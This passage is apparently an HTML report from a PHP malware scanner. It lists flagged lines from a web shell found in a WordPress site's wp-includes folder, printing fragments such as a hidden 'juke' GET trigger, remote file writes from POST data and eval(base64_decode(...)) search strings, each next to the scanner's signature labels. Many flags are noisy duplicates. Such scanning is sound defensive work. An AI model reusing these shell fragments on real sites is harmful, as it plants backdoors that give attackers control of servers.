<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_48").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/3JiNftAP5Tv.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_49" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
